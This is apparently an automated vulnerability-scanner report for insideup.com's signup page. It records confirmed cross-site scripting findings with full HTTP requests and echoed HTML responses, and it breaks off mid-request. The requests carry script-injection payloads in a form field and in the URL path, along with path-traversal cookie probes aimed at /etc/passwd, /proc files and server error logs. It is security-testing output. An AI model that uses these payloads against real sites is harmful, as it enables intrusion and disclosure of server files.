value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST '"--></style></script><script>alert(0x0013DE)</script>
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 260
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName=Smith&password1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0013DE)%3c%2fscript%3e&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:34 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DDF1C95C2918A187514FB7C3704C36A4; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013ED)%3C/script%3E

/ppc/leadflow/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013ED)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013ED..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013ED)</script>

Request

GET /ppc/leadflow/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013ED)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/js/jquery.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 